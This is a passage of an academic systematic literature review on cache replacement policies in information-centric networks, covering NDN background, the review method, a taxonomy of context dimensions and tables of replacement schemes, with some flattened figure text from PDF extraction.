are examples of policies used in ICNs. The current literature presents a massive number of performance evaluations for cache replacement policies comparing different policies concerning different network contexts. A network context refers to a network type—for example, Edge networks, Internet of Things (IoT) networks, or Vehicular Ad-hoc NETworks (VANETs)—instantiated with particular characteristics for a given purpose. A network context thus brings up a broader view that encompasses characteristics regarding the network type and other entities related to network performance (e.g., user habits while using the network). Each performance evaluation may present distinct variations in the context characteristics, as well as different impacts on policy performances, including changes in performance rank. The variance of results indicates that the policies’ performance tends to vary according to the context’s characteristics, and the process of choosing the suitable policies should consider the context in which the caches operate. Given the above, several works incorporated the adaptation of policies according to some context. For instance, Beck et al. (2017) proposed a rule-based stream reasoning technique to allow CCN routers to dynamically switch between existing cache replacement policies to adapt to network traffic changes. Moreover, Moon et al. (2016) presented a cache management scheme for wireless NDNs, in which common access points (APs) and user devices attached to the APs have available cache capacity. The authors advocated Pires et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.418 2/51 http://dx.doi.org/10.7717/peerj-cs.418 https://peerj.com/computer-science/ that each device can choose to work with a different cache replacement policy to improve network performance. In addition to that, Charpinel et al. (2016) proposed a Software- Defined Networking (SDN) approach to provide programable cache replacement algorithms. The replacement algorithms are defined in a control plane. Meanwhile, a CCN controller can modify the replacement schemes dynamically and allocate different strategies for each node. Finally, Pacifici & Dán (2013) proposed autonomous caching in peering ISPs for collaborative deciding their replacement policies. Although studies recognize the need to adopt policies according to the network context, the choice itself of a suitable scheme is not trivial. There is no explicit and general understanding of the relationship between the context characteristics and the policies. Such understanding is essential to assist the choosing process and, consequently, adapt policies according to the context. More specifically, there are no overall directions or categorization in which context may influence policy behavior. Yet, regardless of the isolated evidence of individual works reporting their contexts and impacts on the policies’ performance, there is no comprehensive work discussing a unified view of the different contextual characteristics and their effects on the policies. The delimitation of context characteristics and their common effect can enhance and substantiate the caching management and the design of caching solutions. Despite the contributions of previous literature reviews related to caching policies and ICN aspects (Ahlgren et al., 2012; Bari et al., 2012; Zhang, Li & Lin, 2013; Tyson et al., 2012; Xylomenos et al., 2013; Fang et al., 2014; Amadeo et al., 2014; Zhang, Luo & Zhang, 2015; Abdullahi, Arif & Hassan, 2015; Fang et al., 2015; Ioannou & Weber, 2016; Amadeo, Campolo & Molinaro, 2016; Saxena et al., 2016; Din et al., 2017), there is a lack of guidelines to understand context characteristics and their effect on the cache replacement policies in ICNs. Furthermore, surveys on web cache replacement policies (Wang, 1999; Podlipnig & Böszörmenyi, 2003; Balamash & Krunz, 2004; Panda, Patil & Raveendran, 2016) do not address this subject. To the best of our knowledge, there is no broad investigation on cache replacement schemes for the ICN domain or an integrated vision of the impacts of different context characteristics in the policy choice process. As a result, the lack of suitable schemes hinders the more efficient use of available cache resources, and therefore the effective extraction of the caching service expected benefits. In this article, we present a systematic literature review (SLR) that, in contrast to previous works, investigates evidence in the literature about the effects of context aspects on cache replacement schemes’ performance. SLR is a straightforward and consistent process to compile evidence to answer a set of research questions and help further understand the evidence reported. To this end, we first cataloged the cache replacement schemes used in ICNs. The current literature presents various proposed strategies exploring different context aspects to enhance the eviction logic, aiming to achieve more potentially precise and customized techniques. We mapped context dimensions related to the content, network, node, and human aspects. We then categorized the respective context properties used by the replacement schemes proposed for ICNs. With the context properties, we provide a taxonomy of context dimensions and a policy categorization accordingly. Taxonomies may support the choosing process in the absence Pires et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.418 3/51 http://dx.doi.org/10.7717/peerj-cs.418 https://peerj.com/computer-science/ of the overall understanding of specific network contexts and what influences policy behavior. In addition to the taxonomy, we compiled the context variations with reported relevant impacts on the policies, especially those leading to changes in the policies’ performance rank. This SLR was able to identify common context factors that differentiated the choice of best policy performance. Even so, as expected, there is no single optimal strategy to meet the requirements of all surveyed network contexts, since the performance of the caching policies varied according to the characteristics of each network. Last, we extended the SLR results with the analysis of proper context dimensions to be explored by the eviction process in different emergent networks, such as information-centric Internet of Things (Arshad et al., 2018; Dong & Wang, 2016), vehicular named-data networking (Khelifi et al., 2020), and in-network cache-based edge computing solutions (Zhou et al., 2017; Zhang et al., 2018). These emergent networks have gained attention from the research and industry communities, fostering the evolution of heterogeneous ICN solutions. The taxonomy and policy classification presented in this article can help to infer the choice among current or new policies adapted to these networks to ensure better network performance. Hence, the contribution of this article is threefold. It (i) provides a classification of contexts to assist those engaged in the design of adaptive caching solutions for ICN that target the more efficient use of available cache resources; (ii) substantiates the reasoning of the caching policy decision process during the design of caching systems by presenting and analyzing information from previous works; and (iii) contributes to the set of knowledge on caching systems regarding emergent networks and underpins context-aware caching solutions. The remainder of the article is organized as follows. Background section presents the basic concepts of ICN and cache replacement schemes. The following section outlines the SLR methodology process, with the definition of the leading research questions. Results and analysis section presents the SLR results, with answers to the research questions and analysis of the main findings. In the ‘Applications’ section, this work contributes with a discussion of emergent networks and the association with context dimensions that can be explored to enhance the cache eviction process. The following section discusses relevant research directions. Finally, the last section concludes the article. BACKGROUND In this section, we present introductory concepts of ICN architectures and cache replacement policies. Information-centric networks Information-centric networking is a new Internet architecture proposal widely discussed in the literature designed to meet the current de facto usage pattern of the Internet: the dissemination of content, such as videos and web pages. ICN comprises interconnected core functionalities for content naming, caching, and routing/forwarding to natively provide a content dissemination network. In its fundamental concept, the content name becomes an essential element for network routing, enabling the decoupling of content Pires et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.418 4/51 http://dx.doi.org/10.7717/peerj-cs.418 https://peerj.com/computer-science/ location from the content delivery process. Allied to that, ICN replicates contents in caches distributed across the network at the routers, and the closest copy will be returned when a user requests a content. Beyond the advantages of caching that provide reductions of network congestion, server loads, and access latency, the premise of independence of content location paves the way for efficient content distribution. Therefore, it adds advantages to ICN architectures, such as native support for mobility and multicast communication. The informational RFC 8763 (Rahman et al., 2020) presented by the Internet Research Task Force (IRTF) Information-Centric Networking Research Group (ICNRG) discusses some approaches for the real-world deployment of ICNs and trial experiments. Besides the clean-slate approach, there are directions for its coexistence with the TCP/IP—for example, the ICN adoption as an overlay network. The overlay approach proposes ICN islands deployed over existing IP infrastructure and connected using tunneling solutions. In this way, ICN packets are encapsulated inside IP packets through ICN/IP tunnels. Madureira et al. (2020) propose a resembling overlay approach with an SDN-based core network connecting edge networks operating NDN. In that case, the SDN core network encapsulates the NDN packet. Another approach is ICN as an underlay network, with the ICN islands connected to the Internet through proxies or protocol conversion gateways. The literature presents several ICN architectures, such as Data-Oriented Network Architecture (DONA) (Koponen et al., 2007), Content Mediator architecture for content- aware Networks (COMET) (Garca et al., 2011), MobilityFirst (Raychaudhuri, Nagaraja & Venkataramani, 2012), and the previously mentioned NDN. They explore different architectural decisions about the naming scheme, caching, and routing processes (Xylomenos et al., 2013). Overall, the support for in-network caching is an essential feature of ICN design. In general, every router works with a CS structure to temporally store the contents. This way, when a router receives a content request, the router verifies whether the content is present in its own CS and immediately returns the content if stored locally. Otherwise, the router will forward the request to another destination. Among the different architectures, NDN outstands as a recent and promising trend to substitute (or coexist with) the current TCP/IP model. In NDN, each CR has three main structures to support in-network caching: CS, Pending Interest Table (PIT), and Forwarding Information Base (FIB). Figure 1 illustrates an overview of the interaction among these structures. A content request comes in the form of an Interest packet to the CR, which returns a copy of the content in a Data packet format if the content is already present in its CS for the same incoming interface of the Interest packet. Otherwise, a new PIT entry records a pending Interest with the respective incoming interface, and the CR forwards the Interest packet according to some named-based protocol. Multiple interests for the same data are aggregated in the same PIT entry. Once the Data-packet arrives at the CR, the corresponding PIT entry is satisfied by forwarding the data to the saved interfaces. The CS will, therefore, store the passing data according to some cache management protocols. There are different policies to tackle the management of the CS structure. They can be classified as placement and replacement policies. Placement policies, also called Pires et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.418 5/51 http://dx.doi.org/10.7717/peerj-cs.418 https://peerj.com/computer-science/ insertion policies, target the decision of whether a passing content should be stored locally. Examples of placement policies include Leave Copy Everywhere (LCE), Probabilistic caching (Prob), Leave Copy Down (LCD) (Laoutaris, Syntila & Stavrakakis, 2004), Betweenness Centrality (Betw) (Chai et al., 2012), ProbCache (Psaras, Chai & Pavlou, 2012), and CRCache (Wang et al., 2014b). On the other hand, replacement policies are methods used to choose which content to evict from the cache when there is the need for storing new content, and no more space is available. Examples of replacement policies include LRU, LFU, Random, First-In-First-Out (FIFO), Recently/Frequently Used (LRFU) (Lee et al., 2001) and Recent Usage Frequency (RUF) (Kang, Lee & Ko, 2012). This work focuses on replacement policies, as we detail in the following sections. Cache replacement policies Cache capacity tends to be a small segment of the amount of distinct content distributed over the network. Thus, it is essential to have an efficient eviction scheme among the cache management protocols. A replacement policy ensures that the content most expected to be accessed in a short time will remain in the cache, and the policy will, therefore, elect to evict the content that is less expected to be accessed. The performance gain of a network of caches like ICN depends on the reliability of the cache management, and different policies lead to different performance. Traditional policies, such as LRU, LFU, or FIFO, are eviction strategies inherited from computer memory systems and are commonly used in ICN and web-proxy caching domains. These policies have been massively explored to analyze cache characteristics and the performance of complex network contexts through approximation models. Orthogonally, they were not designed to fit the needs of a network of caches and do not explore its potential. Thus, the literature presents a variety of newly proposed schemes. CS PIT FIB Interest packet forward Data packet add incoming interface drop forward Interest Upstream CS PIT clear entry Data packet cache forward Data packet discard Data lookup miss lookup hit x x xx x Figure 1 Packet forwarding engine at an NDN router (Zhang et al., 2014). Full-size DOI: 10.7717/peerj-cs.418/fig-1 Pires et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.418 6/51 http://dx.doi.org/10.7717/peerj-cs.418/fig-1 http://dx.doi.org/10.7717/peerj-cs.418 https://peerj.com/computer-science/ Jin et al. (2017) surveyed solutions for mobile caching in ICN, and among the contributions, they briefly described sets of cache insertion and replacement policies. Besides the usual LRU, LFU, FIFO, and simple Random, the list of replacement policies includes LRFU, LRU-k (O’neil, O’neil & Weikum, 1993), Time Aware Least Recent Used (TLRU) (Bilal & Kang, 2014), Aging Popularity-based Caching scheme (APC) (Li, Liu & Wu, 2013), Frequency-Based-FIFO (FB-FIFO) (Gomaa et al., 2013), and Adaptive Replacement Cache (ARC) (Megiddo & Modha, 2004). However, there is no broader study on replacement schemes for ICN domains. This SLR cataloged the schemes proposed for ICN to investigate contextual influences on the policies. Therefore, this work does not seek to discuss individual policies, and the reader can refer to the original literature to further information. SYSTEMATIC LITERATURE REVIEW METHODOLOGY The SLR methodology specifies a well-defined searching protocol, with the definition of research questions, research strings, explicit inclusion criteria of articles, among other steps. The methodology used in this article follows an adaptation of previously adopted SLRs in the Software Engineering discipline (Kitchenham & Charters, 2007; Petersen et al., 2008). Figure 2 summarizes the adopted SLR process. The planning process ensures delimitation of the search scope with the definition of leading research questions, inclusion criteria, and the necessary inputs to operate the search. The search process is the article triage phase to collect relevant works and extract meaningful data that match the research questions. The data analysis evaluates the extracted data to summarize the primary evidence and point contributions. The following subsections detail the planning, searching, and analysis processes. Planning process This study aims to map context information associated with the performance of cache replacement strategies to help the choosing and design process while applying ICN. Since the scope and definition of context information can be relative to the research domain, we intended to characterize relevant dimensions surrounding the cache Conduct Search All Retrieved Papers Screening of Papers Potential Relevant Papers Data Extraction Relevant Papers Data Analysis Systematic Review: Outcomes Steps Planning Search Research questions (RQs) Inclusion criteria Scientific databases Keywords Search strings Search methodology N = 1650 N = 275 N = 170 Outputs for RQs Analysis Analysis of outcomes Figure 2 Steps of the SLR process. Full-size DOI: 10.7717/peerj-cs.418/fig-2 Pires et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.418 7/51 http://dx.doi.org/10.7717/peerj-cs.418/fig-2 http://dx.doi.org/10.7717/peerj-cs.418 https://peerj.com/computer-science/ replacement schemes. Additionally, we also intended to identify the cache replacement strategies applied and their context characteristics, and investigate reported evidence about how the identified context information influences the behavior of cache replacement policies in ICNs. To this end, we defined the following research questions (RQs): RQ1: What is context from the perspective of a cache replacement policy? RQ2: Which are the context characteristics used by the policies? RQ3: Which are the cache replacement strategies applied for in-networking caching in ICN? RQ4: What context variations had effects on the performance of the cache replacement strategies? Notice that the research questions correlate with each other in the sense that they rely on each other’s outputs in different ways: the first three questions are requisites to answer the last question; to answer RQ2 it is necessary a primary overview direction for RQ1 and also the output for RQ3; the complete delimitation of context that answers RQ1 is an iterative process that relies on RQ2 and RQ3 outcomes. After the definition of the research questions, we specified a list of relevant keywords based on the analysis of manually selected articles, and we defined correspondent search strings using AND and OR operators, as shown in Table 1. The search strings were meant to drive automatic searches on relevant research engines. We adapted the search strings according to the syntax of the scientific databases. The selection criteria included works written in English, addressing any aspects of cache replacement policy comparisons in ICNs. We also had the articles approaching new schemes for the eviction process for ICNs as part of the contributions. Searching process The first step of the searching process was applying the automatic searches as specified in the planning phase. We did not set a lower year threshold in the search databases for the publication year range, and the upper bound was set to 2019. We cataloged a total of 1,650 articles in this phase. In the following, the screening process comprehended abstract reading and analysis of all matched articles, to filter according to the inclusion criteria. Upon abstract filtering, we obtained 275 articles. Those were potential works where we could find answers to the predefined research questions. Finally, we performed full article reading and analysis of the potential works to extract relevant information and evidence about the research questions. As a result, we reached a total of 168 articles pertinent to our research. Additionally, we incremented the results by carrying out a non-systematic snowballing research process on the read articles and search engines to Table 1 Search string example. (“ICN” OR “NDN” OR “CCN” OR “information centric” OR “information-centric” OR “named data” OR “named-data” OR “content centric” OR “content-centric”) AND (“cache” OR “caching”) AND (“replacement” OR “eviction” OR “performance” OR “management” OR “policy” OR “policies”) Pires et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.418 8/51 http://dx.doi.org/10.7717/peerj-cs.418 https://peerj.com/computer-science/ update with new works not covered in the first search. This process resulted in the addition of two relevant documents. Analysis process The resulting articles and their correspondent extracted data consisted the input for our study. In this phase, we categorized and correlated data from different articles to empirically mining relevant information patterns. We report our main findings regarding the research questions in the following section. RESULTS AND ANALYSIS The SLR process described in the previous section enabled us to answer the main research questions introduced in this manuscript. The following subsections describe the process to accomplished this. RQ1: context dimensions Many definitions of context have been given in the literature as well as different methods to model and design context-aware applications (Abowd et al., 1999; Bettini et al., 2010; Dey, 2001; Liu, Li & Huang, 2011; Vieira, Tedesco & Salgado, 2011; Alegre, Augusto & Clark, 2016; Van Engelenburg, Janssen & Klievink, 2019). Although there is no single consensual definition, they all converge on the importance and benefits of integrating the awareness of any relevant information from relevant entities with the computational environment. As a result of the literature review analysis process, our definition of context comprises, in a broad sense, information that can be used by the policy as input data to direct the eviction process. Also, it includes information “external” to the policy that can be used within a computational environment and could influence the policy’s performance. To understand and delimit what entities could represent the context from the perspective of cache replacement strategies, we direct the article reading and extraction of possibly relevant information based on leading questions related to the content. Since the process of dealing with contents is the overall purpose of having caching policies, we placed content as a feedstock for caching policies, and we defined questions from the content’s point of view, as follows: � What content is being requested? In this dimension, we seek for characteristics of the content itself (and the application), such as content size, popularity, type; � When is the content requested? This dimension specifies time-related information regarding the content and its relation to the user—for instance, time of access, time of creation, or user delay to receive the content. � Where is the content located and distributed? This dimension specifies network characteristics, such as topology and link capacity, and features about the node/routers that store the content, such as cache capacity and the number of interfaces. � Who is requesting the content? Also, who is publishing the content? This dimension relates to the human aspect, in which preferences, behavior, and routines are mapped as Pires et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.418 9/51 http://dx.doi.org/10.7717/peerj-cs.418 https://peerj.com/computer-science/ a context dimension. The dimension can also refer to machine-to-machine communication, but, in this case, the characteristics overlap with information of the node contemplated in the previous dimension. Therefore, we extracted relevant information that would apply to these dimensions and correlate with the cache replacement schemes. Based on the extracted data, we characterized context dimensions according to four main categories: network, node, content, and human. Figure 3 illustrates the hierarchy of our classification. A context view is represented by current information of cached content in a particular node, which belongs to a network, and is accessed or produced by a user. Each of these dimensions contains properties related to the cache eviction process in one or more of the surveyed articles. We detail the list of properties in the next subsection. Additionally, we also consider ICN architecture decisions as part of the context. The other cache-related protocols, such as placement policies or naming schemes, are relevant aspects and should be included as part of the context. This article surveyed the impacts of different architecture decisions on the replacement schemes; however, the discussion of specific caching protocols properties is out of the scope of this work. RQ2: context characteristics Our second research question aims at identifying the context characteristics directly related to the policies. To this end, we collected the types of information used as input data for the replacement schemes and classified correspondent properties for the main context dimensions of Fig. 3. We further discuss the context characteristics as follows: � The content dimension is subcategorized into four types of properties: feature, popularity, time-related, and type-specific. The feature properties are global ones, that is, are inherent to the content and usually do not vary according to the other context dimensions. Conversely, popularity and time-related properties are related to the node caching the content, and consequently, their values differ from node to node. The type- specific subcategory is reserved for specifying singular aspects of data or application types. Figure 4 contains a list of properties extracted from the surveyed articles for the content dimension. In this case, the type-specific properties are mainly about video content, for illustrative purposes. � The node dimension is subcategorized in resource, connectivity, location, content- related, and traffic. Accordingly, the resource properties are inherent to the node; connectivity and location features are mostly related to neighbor nodes and the position of the node into the topology. The content-related represents the intersection with the content’s dimension and gathers content’s information in a broader granularity. The traffic properties are related to the flows of data traffic passing through the node. Figure 5 shows the list of properties extracted from the surveyed articles for the node dimension. � The network dimension represents properties common to general network types. The properties are categorized into four classes: resource, topology, traffic, and Pires et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.418 10/51 http://dx.doi.org/10.7717/peerj-cs.418 https://peerj.com/computer-science/ time-related. The resource class groups the overall network capabilities, such as bandwidth, link capacity, and fetching content costs. The topology properties are more specific about network’s size, represented mainly with the distances between nodes. The traffic class has the same connotation as in the node dimension but differs in granularity, and the time-related class defines temporal properties. The presented properties in the time-related class are similar to some of the topology properties. They are related to the distance between nodes measured in time units to reflect the delay to retrieve content. Figure 6 presents the list of properties extracted from the surveyed articles for the network dimension. The previous list of properties is a broad definition of context characteristics to assist in the analysis of cache replacement schemes. It helps to visualize what dimensions are directly related to the policies and could significantly impact the applied network context. However, it is not a static list and can be increased as new information becomes available and relevant to a specific ICN instance. Furthermore, some of those properties are closely related to more than one context dimension. It is possible to change their perspective in terms of classification to represent a given ICN context. Moreover, the unified view of properties can substantiate the design of novel cache solutions by helping to identify potential gaps for new situations. The human dimension is an emergent and new approach to be explored as part of the context. Recent research fields like people-centric networking (Conti et al., 2015) and human-centric multimedia networking (Rosário et al., 2016) are gathering attention to the basic fact that users play an essential role in demanding contents or network services, and different human characteristics can lead to different impacts on the network. In this way, human attributes are potential drivers in the design of network solutions. The many examples of human data, such as behaviors, interests, personality, character, social interactions, humor, daily routines, gender, age, etc., opens up a range of possibilities to be explored. Pires et al. (2018) performed experiments with real user data and associated distinct user habits with different cache replacement policies. The work reinforces the relevance of the human dimension for network configuration. However, it is an incipient research field, and there is still a lack of studies intersecting human features with caching policies. Thus, it was unsuitable for proposing a proper classification of properties for the human dimension in the current research. Moreover, although some policies intended to incorporate features related to the user in the caching process (Al-Turjman, Al-Fagih & Hassanein, 2013; Xing et al., 2017; Zhang, Tan & Li, 2018), the human characteristics are not directly used by the policies. For instance, Wei et al. (2014) proposed a mobility-aware caching strategy for mobile networks in which they model the transition of users among WiFi access points as a stationary Markov model. In a broad sense, the user’s mobility has the same connotation as the node’s mobility. In the surveyed works that deal with mobility, the concept of a node’s mobility suits the objectives since the human dimension is not directly associated with mobility patterns. Different user’s profiles can be associated with different mobility patterns, for example, different ages or professions (Liang et al., 2012) or even different personalities (Chorley et al., 2013). Pires et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.418 11/51 http://dx.doi.org/10.7717/peerj-cs.418 https://peerj.com/computer-science/ RQ3: cache replacement schemes for ICNs The literature shows various proposed replacement schemes for ICNs exploring beyond the context of the content and adding properties of node and network’s dimensions. In this direction, we cataloged the replacement schemes applied to the surveyed articles to Figure 3 The hierarchy of context dimensions identified from the surveyed articles and the proposed classification for the correspondent characteristics associated with the cache replacement schemes. Full-size DOI: 10.7717/peerj-cs.418/fig-3 CONTENT PopularityFeature Time-related Type-specific - chunk/content size - chunk sequence number - content prefix name - chunk/content type - chunk/content priority - chunk/content category - chunk/content provider identification - chunk/content monetary cost - content's additional features (e.g., the type of multimedia, the style, the theme, the popularity before officially released, the aiming group, the cost, the place of origin, etc.) - chunk/content hit count - chunk/content request count - chunk/content category request count - chunk/content popularity degree (given and calculated by a content provider) - chunk/content initial popularity value (defined by content provider) - number of requests for neighboring chunks in a same content - chunk/content last access time - chunk/content penultimate access time - chunk/content requests arrival time - chunk/content average request arrival time - time when request for a chunk/content is satisfied (node response) - time when a chunk/content was written in the memory - time when a chunk/content request count is calculated - chunk/content creation time on producer - chunk/content expiration time - chunk/content maximum expiration time - counter which shows the recency of a chunk/content in the cache - video segment resolution level (video quality) - request count by video segment resolution level - weight value for each layer of encoded SVC video packet (layers = video bitrate = quality) - for MPEG Video: number of frames between two consecutive I-frames (called Group of Picture - GoP) - for MPEG Video: number of GoPs needed in a receiver to start playing. - for video with coding standards following Network Abstraction Layer (NAL): NAL unit data type Figure 4 Properties from content dimension extracted from the cache replacement schemes for ICNs. Full-size DOI: 10.7717/peerj-cs.418/fig-4 Pires et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.418 12/51 http://dx.doi.org/10.7717/peerj-cs.418/fig-3 http://dx.doi.org/10.7717/peerj-cs.418/fig-4 http://dx.doi.org/10.7717/peerj-cs.418 https://peerj.com/computer-science/ collect context features and understand their correlations. To better readability, we classified the schemes according to the classes of context information they used. They are classified in: content-based; content and network-based; content and node-based; content, network and node-based; and network and/or node-based schemes. Tables 2–6 contain the lists of the cache replacement schemes in each class, respectively. The tables also detail the correspondent context property categories used by the policies, which reveal the diversity of context combinations explored in the literature. We grouped the policies accordingly. This classification provides a comprehensive view of what context NODE ConnectivityResource Location Content-related - CS cache capacity - number of interfaces - general cost of locally serving a chunk - storage energy consumed to store a chunk - memory slot number - PIT Interest-packet timeout - one-hop neighbor nodes - status of cache capacity of its one-hop neighbor nodes - number of occurrences of a content within the one-hop neighborhood - information of the content with the lowest popularity from one- hop neighbors nodes - number of neighbor nodes which requested a content - mobility pattern - location of the node into the topology - node betweenness centrality (the number of times a specific node lies on the content delivery paths between all pairs of nodes in a network topology) - reachability of a node (as a function of the number of nodes between any two nodes) - node´s general rank according to topology position (either assigned arbitrarily or based on some metric such as betweenness centrality, closeness centrality, or node degree) - number of contents - number of content video titles - number of chunks by content - number of chunks by content video titles - number of chunks by producer - number of chunks by category - number of contents by prefix name portion - maximum chunk resquest rate (know at the node at any instant of time) - minimum chunk request rate (predefined minimum popularity threshold value to be cached) - interface of incoming request for a chunk - number of interfaces saved in the PIT entry for a chunk Traffic - number of flows (active downloads) currently passing over each of the node interfaces - total request rate - number of broadcasted video frames per second; Figure 5 Properties from node dimension extracted from the cache replacement schemes for ICNs.Full-size DOI: 10.7717/peerj-cs.418/fig-5 NETWORK ResourceTopology Traffic Time-related - distance / hop count from the node to the content producer - distance / hop count from the node to the next node caching the content; or the content producer - distance / hop count from the node to the consumer - maximun hop count possible from the node to a content producer - Euclidean distance from the node to the content producer - number of nodes - link capacity - ling general cost - bandwidth consumed in downloading a chunk - energy cost of fetching a chunk from other caches or the source - energy cost for wireless transmission a chunk from an access point to the requester user equipment - general cost of fetching a chunk from the nearest neigbor - general cost of fetching a chunk from the content producer - general cost of transferring a chunk across two nodes - the max cache capacity within a sub-network - total request rate for all chunks being requested by all nodes - total request rate for a chunk being requested by all nodes - number of users - network delay for retrieving a content - maximum delay for retrieving a content Figure 6 Properties from network dimension extracted from the cache replacement schemes for ICNs. Full-size DOI: 10.7717/peerj-cs.418/fig-6 Pires et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.418 13/51 http://dx.doi.org/10.7717/peerj-cs.418/fig-5 http://dx.doi.org/10.7717/peerj-cs.418/fig-6 http://dx.doi.org/10.7717/peerj-cs.418 https://peerj.com/computer-science/ Table 2 Content-based cache replacement schemes. Content property categories Replacement schemes Popularity Rossi & Rossini (2011), Chao et al. (2013), Ran et al. (2013), Yeh et al. (2015), Nakayama, Ata & Oka (2015), Liu, Zhu & Ma (2016), Zhao et al. (2017), Kalghoum & Gammar (2017), Sinky et al. (2018), Li, Yu & Li (2018), Kalghoum & Saidane (2019) Time-related Ravi, Ramanathan & Sivalingam (2014), Li, Ma & Hu (2015a), Rezazad & Tay (2015), Rhaiem, Fourati & Ajib (2016), Shukla & Abouzeid (2017), Dhiab et al. (2017), Vural et al. (2017), Hou et al. (2019), Meddeb et al. (2019), Din et al. (2019) Popularity and time-related Wang et al. (2012a), Neves dos Santos et al. (2013), Qian et al. (2014), Chen et al. (2014), Abidi & Gammar (2015), Xin et al. (2016), Yao et al. (2018), Chootong & Thaenthong (2017), Zhang, Tan & Li (2018), Huang et al. (2018), Tang et al. (2019) Popularity, time-related and feature Kang, Lee & Ko (2012), Bilal & Kang (2014), Han et al. (2014), Bilal & Kang (2017), Sri Prakash & Moharir (2018), Sertbaş et al. (2018) Time-related and feature Thomas & Xylomenos (2014), Rao, Schelen & Lindgren (2016), Wu et al. (2014), Tarnoi et al. (2019) Popularity and feature Chandrasekaran, Wang & Tafazolli (2015), Chandrasekaran et al. (2018), Lee & Hong (2017) Popularity and type-specific Jia et al. (2016), Ge et al. (2016) Time-related and type-specific Zhang et al. (2017c) Time-related, type-specific and feature Ghahfarokhi, Moghim & Eftekhari (2017) Type-specific and feature Lee, Lim & Yoo (2013) Popularity, time-related, type- specific and feature Lee, Lim & Yoo (2013) Table 3 Content and Node-based cache replacement schemes. Content property categories Node property categories Replacement schemes Popularity Location Wei et al. (2014), Chen et al. (2016), Mick, Tourani & Misra (2016), Lal & Kumar (2019) Content-related Lal & Kumar (2016), Zhang, Tan & Li (2017b), Baugh & Guo (2018) Traffic Saltarin et al. (2018) Traffic and connectivity Yang & Choi (2018) Traffic and location Liu et al. (2019b) Popularity and time-related Traffic Karami & Guerrero-Zapata (2015), Rocha et al. (2016), Zhou & Ye (2017), Khan & Khan (2017), Qu et al. (2018) Connectivity An & Luo (2018) Content-related and traffic Yao et al. (2019) Time-related and feature Content-related Hahm et al. (2016) Connectivity and location Aoki & Shigeyasu (2017) Popularity, time-related and feature Connectivity Wood et al. (2013) Content-related and traffic Ong et al. (2014) Popularity and feature Content-related Li et al. (2015b), Dron et al. (2013) Pires et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.418 14/51 http://dx.doi.org/10.7717/peerj-cs.418 https://peerj.com/computer-science/ Table 4 Content and Network-based cache replacement schemes. Content property categories Network property categories Replacement schemes Popularity Topology Wang et al. (2011), Wang, Bi & Wu (2012b), Ming, Xu & Wang (2012), Ren et al. (2014), Hu et al. (2015), Huang et al. (2017), Khan et al. (2018) Resource Caarls, Hargreaves & Menasché (2015) Traffic and time- related Sinky et al. (2018) Popularity and time- related Topology Chen, Fan & Yin (2013), Ostrovskaya et al. (2018) Time-related Yokota et al. (2016) Resource Pal & Kant (2017) Popularity and feature Resource Wang, Bayhan & Kangasharju (2015) Time-related Sun & Wang (2015) Resource and time-related Ndikumana et al. (2018) Popularity, time- related and feature Topology Duan et al. (2013) Time-related Time-related Dai et al. (2017) Feature Resource Xing et al. (2017) Table 5 Content, node, and Network-based cache replacement schemes. Content property categories Node property categories Network property categories Replacement schemes Popularity and feature Content-related and location Topology Panigrahi et al. (2014) Content-related and traffic Traffic Liu et al. (2018) Traffic Resource Badov et al. (2014) Resource Time-related and resource Gür (2015) Popularity and time-related Content-related Topology Rath, Panigrahi & Simha (2016) Traffic and location Topology and time-related Al-Turjman, Al-Fagih & Hassanein (2013) Popularity Traffic Topology Chen et al. (2017) Connectivity Topology and resource Zhang et al. (2016) Time-related Resource Topology and resource Llorca et al. (2015) Location Topology Naz, Rais & Qayyum (2016) Popularity, time-related and feature Traffic Topology and time-related Al-Turjman (2017) Table 6 Node and/or network-based cache replacement schemes. Node property categories Network property categories Replacement schemes Content-related and location Topology Wang & Bensaou (2012a, 2012b), Yanuar & Manaf (2017) Content-related and resource Time-related Sureshjani & Moghim (2018) Resource Resource Wang et al. (2014a) – Resource Ioannidis & Yeh (2016, 2018) Pires et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.418 15/51 http://dx.doi.org/10.7717/peerj-cs.418 https://peerj.com/computer-science/ information the techniques required. Therefore, it is the first guide to map which context variances could directly influence the performance of the technique. The content-based replacement policies explore only the characteristics of the content to make the eviction decision. They use one or more of the content features listed in Fig. 4. Following this reasoning, the policies that explore beyond the content and start to look to characteristics of the node or the network that could lead the eviction process to make a better decision are classified accordingly. They also use one or more features listed in Fig. 5 or Fig. 6. Naturally, almost all the schemes further explore the content dimension; however, we also found methods dealing only with network and node features to assist the eviction process. Figure 7 illustrates the usage distribution of context properties by their categories. We ranked the context categories according to the number of policies that used one or more of the corresponding category properties. After content popularity, time-related and feature properties, the network topology and node traffic properties are the most used ones. It is important to remark that for the classification of policies, we did not account for the general use of node CS cache capacity and the number of interface information, since it can usually be part of the caching process. RQ4: effects of context variation Our objective in this section is to carry out an evidence-based analysis and identify what context dimensions can affect the policies’ performance. An evidence-based analysis can increment and drive approximate solutions to the problem of finding the optimal policy. The choice of a best-fitting replacement policy exponentially grows in complexity when there is a diversity of context variables. Many efforts have been employed to comparatively evaluate different policies in different network scenarios. Usually, the evaluations comprises variations of context like cache size, topology, or content popularity. The results gives us approximations and insights about which policy performs better in the evaluated scenarios or which variations in context can impact the policy’s decisions. Such information is essential to help the process of network design when deciding which 0 45 90 Content - Popularity Content - Time-related Content - Feature Network - Topology Node - Traffic Node - Content-related Node - Location Network - Resource Network - Time-related Content - Type-specific Node - Connectivity Node - Resource Network - Traffic Figure 7 Distribution of context properties categories according to the number of policies that used the correspondent properties in their eviction logic. Full-size DOI: 10.7717/peerj-cs.418/fig-7 Pires et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.418 16/51 http://dx.doi.org/10.7717/peerj-cs.418/fig-7 http://dx.doi.org/10.7717/peerj-cs.418 